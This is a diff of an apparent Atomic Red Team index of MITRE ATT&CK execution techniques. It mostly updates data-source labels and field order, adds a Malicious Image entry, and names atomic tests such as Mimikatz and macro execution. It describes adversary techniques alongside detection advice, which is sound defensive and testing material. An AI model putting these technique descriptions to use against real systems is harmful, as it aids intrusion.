and intent. x_mitre_data_sources: - - Loaded DLLs - - DLL monitoring - - File monitoring - - Process command-line parameters - - Process monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Script: Script Execution' x_mitre_platforms: - Windows - macOS - Linux + x_mitre_contributors: + - Cody Thomas, SpecterOps atomic_tests: [] T1569.001: technique: @@ -54084,9 +57486,10 @@ execution: disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Service: Service Creation' + - 'File: File Modification' x_mitre_platforms: - macOS identifier: T1569.001 @@ -54164,9 +57567,10 @@ execution: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement." x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Process monitoring + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_platforms: - macOS identifier: T1053.004 @@ -54201,43 +57605,42 @@ execution: sudo rm /private/var/db/emondClients/#{empty_file} T1204.002: technique: - external_references: - - source_name: mitre-attack - external_id: T1204.002 - url: https://attack.mitre.org/techniques/T1204/002 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Malicious File + created: '2020-03-11T14:49:36.954Z' + modified: '2020-03-11T14:55:56.177Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern + id: attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e description: |- An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the likelihood that a user will open it. While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534). - id: attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-03-11T14:55:56.177Z' - created: '2020-03-11T14:49:36.954Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. - - Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe). - x_mitre_data_sources: - - Anti-virus - - Process command-line parameters - - Process monitoring + name: Malicious File + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1204.002 + url: https://attack.mitre.org/techniques/T1204/002 x_mitre_platforms: - Linux - macOS - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'File: File Creation' + x_mitre_detection: |- + Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. + + Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe). + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' identifier: T1204.002 atomic_tests: - name: OSTap Style Macro Execution @@ -54584,6 +57987,55 @@ execution: cleanup_command: 'Remove-Item #{pua_file} ' + T1204.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1204.003 + url: https://attack.mitre.org/techniques/T1204/003 + - source_name: Summit Route Malicious AMIs + url: https://summitroute.com/blog/2018/09/24/investigating_malicious_amis/ + description: Piper, S.. (2018, September 24). Investigating Malicious AMIs. + Retrieved March 30, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Malicious Image + description: |- + Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs) + + Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)). + id: attack-pattern--b0c74ef9-c61e-4986-88cb-78da98a355ec + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-12T17:54:08.797Z' + created: '2021-03-30T17:20:05.789Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor the local image registry to make sure malicious images + are not added. Track the deployment of new containers, especially from newly + built images. Monitor the behavior of containers within the environment to + detect anomalous behavior or malicious activity after users deploy from malicious + images. + x_mitre_contributors: + - Center for Threat-Informed Defense (CTID) + - Vishwas Manral, McAfee + x_mitre_platforms: + - IaaS + - Containers + x_mitre_data_sources: + - 'Container: Container Creation' + - 'Container: Container Start' + - 'Command: Command Execution' + - 'Image: Image Creation' + - 'Instance: Instance Creation' + - 'Instance: Instance Start' + - 'Application Log: Application Log Content' + atomic_tests: [] T1204.001: technique: created: '2020-03-11T14:43:31.706Z' @@ -54614,9 +58066,9 @@ execution: - macOS - Windows x_mitre_data_sources: - - Anti-virus - - Process monitoring - - Web proxy + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'File: File Creation' x_mitre_detection: |- Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization. @@ -54628,14 +58080,17 @@ execution: atomic_tests: [] T1106: technique: - created: '2017-05-31T21:31:17.472Z' - modified: '2020-07-01T16:19:54.646Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Native API + description: |- + Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. + + Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) + + Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) + + Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system. external_references: - source_name: mitre-attack external_id: T1106 @@ -54682,26 +58137,21 @@ execution: - source_name: macOS Foundation url: https://developer.apple.com/documentation/foundation description: Apple. (n.d.). Foundation. Retrieved July 1, 2020. - description: |- - Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. - - Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC) - - Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation) - - Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system. - name: Native API - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670 - x_mitre_is_subtechnique: false - x_mitre_version: '2.0' - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - System calls - - Loaded DLLs - - API monitoring - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2020-07-01T16:19:54.646Z' + created: '2017-05-31T21:31:17.472Z' + x_mitre_platforms: + - Windows + - macOS + - Linux + x_mitre_remote_support: false + x_mitre_permissions_required: + - User x_mitre_detection: "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish @@ -54715,13 +58165,13 @@ execution: to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. " - x_mitre_permissions_required: - - User - x_mitre_remote_support: false - x_mitre_platforms: - - Windows - - macOS - - Linux + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Module: Module Load' + x_mitre_contributors: + - Stefan Kanthak + x_mitre_version: '2.0' + x_mitre_is_subtechnique: false identifier: T1106 atomic_tests: - name: Execution through API - CreateProcess @@ -54784,10 +58234,7 @@ execution: modified: '2020-10-22T16:43:38.388Z' created: '2020-10-20T00:09:33.072Z' x_mitre_data_sources: - - Network device logs - - Network device run-time memory - - Network device command history - - Network device configuration + - 'Command: Command Execution' x_mitre_platforms: - Network x_mitre_is_subtechnique: true @@ -54802,25 +58249,6 @@ execution: atomic_tests: [] T1059.001: technique: - created: '2020-03-09T13:48:55.078Z' - modified: '2020-06-24T13:51:22.360Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - type: attack-pattern - id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736 - description: |- - Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). - - PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. - - A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) - - PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) - name: PowerShell - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1059.001 @@ -54853,30 +58281,46 @@ execution: description: Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. source_name: FireEye PowerShell Logging 2016 - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Praetorian - x_mitre_data_sources: - - Windows event logs - - Process monitoring - - Process command-line parameters - - PowerShell logs - - Loaded DLLs - - File monitoring - - DLL monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: PowerShell + description: |- + Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). + + PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. + + A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) + + PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) + id: attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2020-06-24T13:51:22.360Z' + created: '2020-03-09T13:48:55.078Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_remote_support: true x_mitre_detection: |- If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. - x_mitre_remote_support: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Script: Script Execution' + x_mitre_contributors: + - Praetorian + x_mitre_platforms: + - Windows identifier: T1059.001 atomic_tests: - name: Mimikatz @@ -55351,10 +58795,8 @@ execution: Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. x_mitre_data_sources: - - System calls - - Process monitoring - - Process command-line parameters - - API monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_platforms: - Linux - Windows @@ -55522,6 +58964,16 @@ execution: ' T1053.005: technique: + created: '2019-11-27T14:58:00.429Z' + modified: '2020-12-30T14:26:44.730Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1053.005 @@ -55557,16 +59009,6 @@ execution: An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). id: attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T13:45:03.730Z' - created: '2019-11-27T14:58:00.429Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_remote_support: true @@ -55588,10 +59030,10 @@ execution: Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data. x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows event logs + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_platforms: - Windows identifier: T1053.005 @@ -55754,16 +59196,6 @@ execution: ' T1053: technique: - created: '2017-05-31T21:30:46.977Z' - modified: '2020-10-14T15:20:01.069Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Scheduled Task/Job @@ -55784,10 +59216,21 @@ execution: source_name: TechNet Task Scheduler Security object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-20T16:31:11.405Z' + created: '2017-05-31T21:30:46.977Z' x_mitre_platforms: - Windows - Linux - macOS + - Containers x_mitre_remote_support: true x_mitre_effective_permissions: - SYSTEM @@ -55808,16 +59251,18 @@ execution: connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement." x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Windows event logs + - 'File: File Creation' + - 'Container: Container Creation' + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_contributors: - Prashant Verma, Paladion - Leo Loobeek, @leoloobeek - Travis Smith, Tripwire - Alain Homewood, Insomnia Security - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_is_subtechnique: false atomic_tests: [] T1064: @@ -55881,10 +59326,6 @@ execution: - Process whitelisting - Data Execution Prevention - Exploit Prevention - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Process command-line parameters x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_deprecated: true @@ -55923,9 +59364,10 @@ execution: x_mitre_platforms: - Windows x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute @@ -56070,10 +59512,8 @@ execution: and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior." x_mitre_data_sources: - - API monitoring - - DLL monitoring - - File monitoring - - Process monitoring + - 'Process: OS API Execution' + - 'Module: Module Load' x_mitre_contributors: - Stefan Kanthak x_mitre_version: '2.0' @@ -56090,7 +59530,7 @@ execution: source_name: capec url: https://capec.mitre.org/data/definitions/187.html description: |- - Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). + Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. @@ -56104,18 +59544,13 @@ execution: phase_name: execution - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T15:27:01.403Z' + modified: '2020-12-11T17:00:00.938Z' created: '2017-05-31T21:30:57.201Z' x_mitre_is_subtechnique: false x_mitre_version: '2.1' x_mitre_data_sources: - - Authentication logs - - File monitoring - - Third-party application logs - - Windows Registry - - Process monitoring - - Process use of network - - Binary file metadata + - 'Application Log: Application Log Content' + - 'Process: Process Creation' x_mitre_detection: "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities @@ -56184,10 +59619,6 @@ execution: processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring. - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Process command-line parameters x_mitre_version: '2.0' atomic_tests: [] T1569: @@ -56225,10 +59656,11 @@ execution: files associated with services. Changes to Windows services may also be reflected in the Registry. x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'Service: Service Creation' + - 'File: File Modification' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_platforms: - Windows - macOS @@ -56285,9 +59717,10 @@ execution: x_mitre_contributors: - SarathKumar Rajendran, Trimble Inc x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' x_mitre_detection: |- Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user. @@ -56386,9 +59819,8 @@ execution: - macOS - Linux x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'Process: Process Creation' x_mitre_detection: "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would @@ -56451,12 +59883,6 @@ execution: name: sh T1204: technique: - created: '2018-04-18T17:59:24.739Z' - modified: '2020-03-11T14:55:56.315Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - type: attack-pattern object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: @@ -56470,11 +59896,25 @@ execution: name: User Execution created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5 - x_mitre_version: '1.2' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + modified: '2021-04-20T16:34:09.236Z' + created: '2018-04-18T17:59:24.739Z' + x_mitre_version: '1.3' x_mitre_data_sources: - - Anti-virus - - Process command-line parameters - - Process monitoring + - 'Application Log: Application Log Content' + - 'Instance: Instance Start' + - 'Instance: Instance Creation' + - 'Image: Image Creation' + - 'Command: Command Execution' + - 'Container: Container Start' + - 'Container: Container Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'File: File Creation' + - 'Process: Process Creation' x_mitre_detection: |- Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads. @@ -56485,23 +59925,20 @@ execution: - Linux - Windows - macOS + - IaaS + - Containers x_mitre_contributors: - Oleg Skulkin, Group-IB x_mitre_is_subtechnique: false atomic_tests: [] T1059.005: technique: - id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67 - description: |- - Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) - - Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) - - Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. - name: Visual Basic - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2020-03-09T14:29:51.508Z' + modified: '2020-08-13T20:09:39.122Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1059.005 @@ -56526,32 +59963,36 @@ execution: url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85) description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: execution - modified: '2020-08-13T20:09:39.122Z' - created: '2020-03-09T14:29:51.508Z' - x_mitre_platforms: - - Windows - - macOS - - Linux - x_mitre_data_sources: - - DLL monitoring - - Loaded DLLs - - File monitoring - - Process monitoring - - Process command-line parameters - x_mitre_detection: |- - Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Visual Basic + description: |- + Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) - Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent. + Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) + + Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. + id: attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67 + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true x_mitre_permissions_required: - User - Administrator - SYSTEM - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_detection: |- + Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or 